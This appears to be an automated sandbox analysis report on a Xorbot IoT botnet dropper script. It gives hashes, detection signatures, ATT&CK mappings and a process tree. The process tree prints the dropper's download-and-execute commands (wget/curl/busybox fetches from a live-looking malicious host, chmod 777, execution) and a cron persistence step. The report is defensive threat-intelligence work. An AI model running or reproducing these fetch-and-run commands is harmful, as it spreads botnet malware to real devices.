xorbot | d3d3f91578e875f1bf3302e63df0e3d51179d6f4e0c3cdcdc4fd7eef1027fc81

Analysis

max time kernel
123s
max time network
152s
platform
debian-9_mipsel
resource
debian9-mipsel-20240611-en
resource tags

arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
28/02/2025, 12:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

BZTS9_bins.sh
Size

10KB
MD5

5f5a8beaeee13fdd7a462ebf3797535c
SHA1

982824d6165ed0668b25d6765b631170fc8bbd1d
SHA256

d3d3f91578e875f1bf3302e63df0e3d51179d6f4e0c3cdcdc4fd7eef1027fc81
SHA512

1569973908da43ee2f414331f4f81ec6106545ec4140272be439351c81bf2e2b27877e9e444c1e7290f195510f59b475de7885999bcc273392e0a0a778b7f01a
SSDEEP

96:YokU5Utt6LLnXIEgLsXasZeEINqKqCqE5FJLeOILQAQ8Q8rLNL04hyK1mZEZIZZy:75tgd4t/NYQ3SuaZNnEb7YQ3Su4ZNnY

Score

10^/10

xorbot botnet defense_evasion discovery execution persistence privilege_escalation trojan

Malware Config

Signatures

Detects Xorbot 2 IoCs

botnet trojan

resource	yara_rule
behavioral4/files/fstream-1.dat	family_xorbot
behavioral4/files/fstream-3.dat	family_xorbot

Xorbot
Xorbot is a linux botnet and trojan targeting IoT devices.
botnet trojan xorbot
Xorbot family
xorbot
Contacts a large (1079) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

File and Directory Permissions Modification 1 TTPs 4 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
795	chmod
803	chmod
811	chmod
819	chmod

Executes dropped EXE 4 IoCs

ioc	pid	Process
/tmp/coICFqXGGl2s21xpUiwHdrnr46yGHCoa0F	796	BZTS9_bins.sh
/tmp/hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl74	804	BZTS9_bins.sh
/tmp/6G97IYt8gwxHmuwzdX3XJSZbLwlVZubf0X	812	BZTS9_bins.sh
/tmp/BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY	820	BZTS9_bins.sh

Renames itself 1 IoCs

pid	Process
821	BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY

Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

Creates/modifies Cron job 1 TTPs 1 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

execution persistence privilege_escalation

Cron

T1053.003

description	ioc	Process
File opened for modification	/var/spool/cron/crontabs/tmp.vqUCgQ	crontab

Enumerates running processes
Discovers information about currently running processes on the system

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/13/cmdline	BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY
File opened for reading	/proc/5/cmdline	BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY
File opened for reading	/proc/966/cmdline	BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY
File opened for reading	/proc/15/cmdline	BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY
File opened for reading	/proc/842/cmdline	BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY
File opened for reading	/proc/957/cmdline	BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY
File opened for reading	/proc/958/cmdline	BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY
File opened for reading	/proc/973/cmdline	BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY
File opened for reading	/proc/6/cmdline	BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY
File opened for reading	/proc/144/cmdline	BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY
File opened for reading	/proc/831/cmdline	BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY
File opened for reading	/proc/838/cmdline	BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY
File opened for reading	/proc/850/cmdline	BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY
File opened for reading	/proc/943/cmdline	BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY
File opened for reading	/proc/166/cmdline	BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY
File opened for reading	/proc/878/cmdline	BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY
File opened for reading	/proc/892/cmdline	BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY
File opened for reading	/proc/662/cmdline	BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY
File opened for reading	/proc/837/cmdline	BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY
File opened for reading	/proc/834/cmdline	BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY
File opened for reading	/proc/886/cmdline	BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY
File opened for reading	/proc/939/cmdline	BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY
File opened for reading	/proc/376/cmdline	BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY
File opened for reading	/proc/940/cmdline	BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/11/cmdline	BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY
File opened for reading	/proc/918/cmdline	BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY
File opened for reading	/proc/955/cmdline	BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY
File opened for reading	/proc/841/cmdline	BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY
File opened for reading	/proc/919/cmdline	BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY
File opened for reading	/proc/969/cmdline	BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY
File opened for reading	/proc/71/cmdline	BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY
File opened for reading	/proc/846/cmdline	BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY
File opened for reading	/proc/856/cmdline	BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY
File opened for reading	/proc/884/cmdline	BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY
File opened for reading	/proc/885/cmdline	BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY
File opened for reading	/proc/900/cmdline	BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY
File opened for reading	/proc/917/cmdline	BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY
File opened for reading	/proc/860/cmdline	BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY
File opened for reading	/proc/964/cmdline	BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY
File opened for reading	/proc/971/cmdline	BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY
File opened for reading	/proc/985/cmdline	BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY
File opened for reading	/proc/852/cmdline	BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY
File opened for reading	/proc/941/cmdline	BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY
File opened for reading	/proc/970/cmdline	BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY
File opened for reading	/proc/974/cmdline	BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY
File opened for reading	/proc/661/cmdline	BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY
File opened for reading	/proc/682/cmdline	BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY
File opened for reading	/proc/947/cmdline	BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY
File opened for reading	/proc/77/cmdline	BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY
File opened for reading	/proc/854/cmdline	BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY
File opened for reading	/proc/879/cmdline	BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY
File opened for reading	/proc/881/cmdline	BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY
File opened for reading	/proc/927/cmdline	BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY
File opened for reading	/proc/980/cmdline	BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY
File opened for reading	/proc/24/cmdline	BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY
File opened for reading	/proc/888/cmdline	BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY
File opened for reading	/proc/948/cmdline	BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY
File opened for reading	/proc/3/cmdline	BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY
File opened for reading	/proc/684/cmdline	BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY
File opened for reading	/proc/858/cmdline	BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY
File opened for reading	/proc/914/cmdline	BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY
File opened for reading	/proc/70/cmdline	BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY
File opened for reading	/proc/643/cmdline	BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY

System Network Configuration Discovery 1 TTPs 13 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
693	wget
789	curl
799	wget
802	busybox
807	wget
808	curl
816	curl
830	wget
791	busybox
800	curl
810	busybox
815	wget
818	busybox

Writes file to tmp directory 9 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/coICFqXGGl2s21xpUiwHdrnr46yGHCoa0F	wget
File opened for modification	/tmp/hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl74	curl
File opened for modification	/tmp/hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl74	busybox
File opened for modification	/tmp/6G97IYt8gwxHmuwzdX3XJSZbLwlVZubf0X	wget
File opened for modification	/tmp/6G97IYt8gwxHmuwzdX3XJSZbLwlVZubf0X	curl
File opened for modification	/tmp/BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY	curl
File opened for modification	/tmp/coICFqXGGl2s21xpUiwHdrnr46yGHCoa0F	curl
File opened for modification	/tmp/hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl74	wget
File opened for modification	/tmp/BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY	wget

/tmp/BZTS9_bins.sh
/tmp/BZTS9_bins.sh
1⤵
- Executes dropped EXE
PID:685
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:689
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/coICFqXGGl2s21xpUiwHdrnr46yGHCoa0F
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:693
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/coICFqXGGl2s21xpUiwHdrnr46yGHCoa0F
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:789
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/coICFqXGGl2s21xpUiwHdrnr46yGHCoa0F
  2⤵
  - System Network Configuration Discovery
  PID:791
- /bin/chmod
  chmod 777 coICFqXGGl2s21xpUiwHdrnr46yGHCoa0F
  2⤵
  - File and Directory Permissions Modification
  PID:795
- /tmp/coICFqXGGl2s21xpUiwHdrnr46yGHCoa0F
  ./coICFqXGGl2s21xpUiwHdrnr46yGHCoa0F
  2⤵
  PID:796
- /bin/rm
  rm coICFqXGGl2s21xpUiwHdrnr46yGHCoa0F
  2⤵
  PID:798
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl74
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:799
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl74
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:800
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl74
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:802
- /bin/chmod
  chmod 777 hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl74
  2⤵
  - File and Directory Permissions Modification
  PID:803
- /tmp/hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl74
  ./hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl74
  2⤵
  PID:804
- /bin/rm
  rm hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl74
  2⤵
  PID:806
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/6G97IYt8gwxHmuwzdX3XJSZbLwlVZubf0X
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:807
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/6G97IYt8gwxHmuwzdX3XJSZbLwlVZubf0X
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:808
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/6G97IYt8gwxHmuwzdX3XJSZbLwlVZubf0X
  2⤵
  - System Network Configuration Discovery
  PID:810
- /bin/chmod
  chmod 777 6G97IYt8gwxHmuwzdX3XJSZbLwlVZubf0X
  2⤵
  - File and Directory Permissions Modification
  PID:811
- /tmp/6G97IYt8gwxHmuwzdX3XJSZbLwlVZubf0X
  ./6G97IYt8gwxHmuwzdX3XJSZbLwlVZubf0X
  2⤵
  PID:812
- /bin/rm
  rm 6G97IYt8gwxHmuwzdX3XJSZbLwlVZubf0X
  2⤵
  PID:814
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:815
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:816
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY
  2⤵
  - System Network Configuration Discovery
  PID:818
- /bin/chmod
  chmod 777 BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY
  2⤵
  - File and Directory Permissions Modification
  PID:819
- /tmp/BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY
  ./BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY
  2⤵
  - Renames itself
  - Reads runtime system information
  PID:820
- - /bin/sh
    sh -c "crontab -l"
    3⤵
    PID:822
  - - /usr/bin/crontab
      crontab -l
      4⤵
      PID:823
- - /bin/sh
    sh -c "crontab -"
    3⤵
    PID:824
  - - /usr/bin/crontab
      crontab -
      4⤵
      Creates/modifies Cron job
      PID:825
- /bin/rm
  rm BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY
  2⤵
  PID:827
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/WBr82G4zo02tl7Bd1MTHjN8uRoW2qv3rGc
  2⤵
  - System Network Configuration Discovery
  PID:830

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Cron

T1053.003

Persistence

Scheduled Task/Job

T1053

Cron

T1053.003

Privilege Escalation

Scheduled Task/Job

T1053

Cron

T1053.003

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

Network Service Discovery

T1046

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/6G97IYt8gwxHmuwzdX3XJSZbLwlVZubf0X

Filesize
151KB

MD5
3c90d5820bddcf7c5d1bd21dfa49d958

SHA1
5ba05bd489e50af97d6dc45e3a0be60e494d5083

SHA256
bdebb67266d5f96b7d85cfb9644deee81161b54b60b0fded6cf36544a15fa9b2

SHA512
54a0e2ec10040634100fb5c4bddc35f558471f4ff833f9ad20f16ffd14c286cf251841bdaad7c557c3c78efc2094db91038c195c0ddabdecf9beac97ff2ce01a

Download Submit
/tmp/BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY

Filesize
151KB

MD5
6c583043d91c55aa470c08c87058e917

SHA1
abf65a5b9bba69980278ad09356e53de8bb89439

SHA256
2d63c81a782853efe672a1d9cb00a339ec57207b4075754a1baf1df9af466948

SHA512
82ee5f3884edc2cb3e68d8634353964cdb991e250b0592a2f80f5ffb738e64860abe6d030aec0d6ab94596c275b478080579fd65b055cc9055e1ef3de6dd59a5

Download Submit
/tmp/coICFqXGGl2s21xpUiwHdrnr46yGHCoa0F

Filesize
107KB

MD5
eb9c3a0de91fcf16ba17cb24608df68c

SHA1
09d95a7d70d5e115d103be51edff7c498d272fac

SHA256
dd01a1365a9f35501e09e0144ed1d4d8b00dcf20aa66cf6dc186e94d7dbe4b47

SHA512
9e1f3f88f82bb41c68d78b351c8dc8075522d6d42063f798b6ef38a491df7a3bab2c312d536fb0a6333e516d7dc4f5a58b80beb69422a04d1dbc61eaba346e27

Download Submit
/tmp/hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl74

Filesize
127KB

MD5
89077b7bd4bcafca7713be43635c4862

SHA1
fc02edb8fba29ea8ee99e6157ef8560334530052

SHA256
78416feab0c93152d65acc8f48835520db083cc3aed0aea622b9fb88284dc00d

SHA512
1b457b8f8d452eecaad9013241e50672befb70feb5349f5fa72d62ea1fa8affa968763e6511cc76cdc5bf12f080e4a8f10c8e141ccd0d36794e721d690f2c4b1

Download Submit
/var/spool/cron/crontabs/tmp.vqUCgQ

Filesize
210B

MD5
a06149a2151be2e4906920c835f303f3

SHA1
9e381d795ace16c0480d2d80e25f2b4963b43f21

SHA256
7eb9349a8a036748c56c5b908adf5e8f18b72bf21d922e29646cca704c00199f

SHA512
47dd9f88e0720fe1faecdbe10d37ec4f83db26eb2d1b0c1db82451a3a54dba8098e40b3de84e7586a5cb727edb05a70635fb6728c649c7f63b76558546bbc5c8

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads